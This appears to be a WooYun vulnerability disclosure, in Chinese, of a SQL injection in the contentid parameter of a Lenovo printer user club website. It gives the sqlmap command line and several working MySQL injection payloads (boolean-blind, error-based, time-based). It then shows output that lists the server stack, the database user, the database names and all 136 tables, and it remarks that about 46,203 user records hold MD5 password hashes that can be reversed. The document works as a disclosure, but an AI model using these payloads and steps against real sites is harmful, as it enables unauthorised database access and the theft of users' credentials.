WooYun.org

站点：
http://www.lenovoprinterclub.com/cases_detail.php?contentid=44
http://lenovoprinterclub.com 联想打印用户俱乐部
id参数没有过滤，导致注射漏洞
sqlmap.py -u "http://lenovoprinterclub.com/cases_detail.php?contentid=44" --dbs --current-user --current-db
Place: GET
Parameter: contentid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: contentid=44 AND 5503=5503
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: contentid=44 AND (SELECT 9152 FROM(SELECT COUNT(*),CONCAT(0x3a68646
d3a,(SELECT (CASE WHEN (9152=9152) THEN 1 ELSE 0 END)),0x3a6e63673a,FLOOR(RAND(0
)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: contentid=44 AND SLEEP(5)
---
[18:00:27] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.2.23, PHP 5.3.27
back-end DBMS: MySQL 5.0
[18:00:27] [INFO] fetching current user
[18:00:27] [INFO] resumed: pntcom@localhost
current user: 'pntcom@localhost'
[18:00:27] [INFO] fetching current database
[18:00:27] [INFO] resumed: lenovoprinterclub
current database: 'lenovoprinterclub'
[18:00:27] [INFO] fetching database names
[18:00:27] [INFO] the SQL query used returns 2 entries
[18:00:27] [INFO] resumed: information_schema
[18:00:27] [INFO] resumed: lenovoprinterclub
available databases [2]:
[*] information_schema
[*] lenovoprinterclub
Database: lenovoprinterclub
[136 tables]
+------------------------+
| ng_800 |
| ng_admin |
| ng_admin_role |
| ng_admin_role_priv |
| ng_ads |
| ng_ads_1008 |
| ng_ads_1009 |
| ng_ads_1303 |
| ng_ads_place |
| ng_ads_stat |
| ng_announce |
| ng_area |
| ng_ask |
| ng_ask_actor |
| ng_ask_credit |
| ng_ask_posts |
| ng_ask_vote |
| ng_attachment |
| ng_author |
| ng_block |
| ng_c_case |
| ng_c_down |
| ng_c_gift |
| ng_c_info |
| ng_c_ku6video |
| ng_c_news |
| ng_c_picture |
| ng_c_product |
| ng_c_video |
| ng_c_voucher |
| ng_cache_count |
| ng_category |
| ng_collect |
| ng_comment |
| ng_content |
| ng_content_count |
| ng_content_position |
| ng_content_tag |
| ng_copyfrom |
| ng_datasource |
| ng_digg |
| ng_digg_log |
| ng_editor_data |
| ng_error_report |
| ng_form_test1 |
| ng_formguide |
| ng_formguide_fields |
| ng_giftorder |
| ng_guestbook |
| ng_hits |
| ng_ipbanned |
| ng_keylink |
| ng_keyword |
| ng_link |
| ng_linkage |
| ng_log |
| ng_mail |
| ng_mail_email |
| ng_mail_email_type |
| ng_member |
| ng_member_cache |
| ng_member_company |
| ng_member_detail |
| ng_member_group |
| ng_member_group_extend |
| ng_member_group_priv |
| ng_member_info |
| ng_member_regprod |
| ng_member_voucher |
| ng_membertype |
| ng_menu |
| ng_message |
| ng_model |
| ng_model_field |
| ng_module |
| ng_mood |
| ng_mood_data |
| ng_order |
| ng_order_deliver |
| ng_order_log |
| ng_pay_card |
| ng_pay_exchange |
| ng_pay_payment |
| ng_pay_pointcard_type |
| ng_pay_stat |
| ng_pay_user_account |
| ng_player |
| ng_point_detail |
| ng_position |
| ng_process |
| ng_process_status |
| ng_regprod |
| ng_regprod_printhome |
| ng_role |
| ng_search |
| ng_search_type |
| ng_serialnumber |
| ng_session |
| ng_space |
| ng_space_api |
| ng_special |
| ng_special_content |
| ng_spider_job |
| ng_spider_sites |
| ng_spider_urls |
| ng_status |
| ng_times |
| ng_type |
| ng_urlrule |
| ng_video |
| ng_video_count |
| ng_video_data |
| ng_video_position |
| ng_video_special |
| ng_video_special_list |
| ng_video_tag |
| ng_vote_data |
| ng_vote_option |
| ng_vote_subject |
| ng_vote_useroption |
| ng_voucher |
| ng_workflow |
| ng_yp_apply |
| ng_yp_buy |
| ng_yp_cert |
| ng_yp_collect |
| ng_yp_count |
| ng_yp_guestbook |
| ng_yp_job |
| ng_yp_news |
| ng_yp_product |
| ng_yp_relation |
| ng_yp_stats |
| ng_yp_stock |
| test |
| test2010 |
+------------------------+
用户信息46203

部分数据，用户名密码为MD5加密，可被反查。

over